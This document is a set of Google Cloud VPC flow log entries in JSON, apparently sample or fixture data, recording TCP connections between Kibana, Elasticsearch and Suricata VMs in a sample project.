+{"insertId":"bnj3cofh3cdjw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":33064,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:40.243022993Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:40.125336665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk3","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34906},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"bnj3cofh3cdkb","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":58216,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} +{"insertId":"bnj3cofh3cdk4","jsonPayload":{"bytes_sent":"60222","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597279654Z","packets_sent":"361","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075756033Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name
":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkf","jsonPayload":{"bytes_sent":"61810","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"358","reporter":"SRC","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkl","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":58216},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:36.982303071Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:36.865198297Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk2","jsonPayload":{"bytes_sent":"136558","connection":{"dest_ip":"10.87.40.76","dest_port":33510,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565335113Z","packets_sent":"243","reporter":"DEST","rtt_msec":"16","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500418290Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdko","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":34906,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:50.757255245Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:50.642206049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdke","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":52454,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:40.888804332Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:40.779893091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdka","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34090},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:37.827345444Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:37.712749588Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdkn","jsonPayload":{"bytes_sent":"170396","connection":{"dest_ip":"10.87.40.76","dest_port":33530,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565300944Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140119099Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk5","jsonPayload":{"bytes_sent":"171610","connection":{"dest_ip":"67.43.156.13","dest_port":33570,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"71","reporter":"SRC","rtt_msec":"230","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469473010Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"}
+{"insertId":"bnj3cofh3cdk6","jsonPayload":{"bytes_sent":"15186","connection":{"dest_ip":"67.43.156.13","dest_port":33858,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933164456Z","packets_sent":"75","reporter":"SRC","rtt_msec":"253","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458515996Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
+{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"67.43.156.13","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.168.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"67.43.156.13","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"67.43.156.13","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"67.43.156.13","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"67.43.156.13","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"67.43.156.13","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
+{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
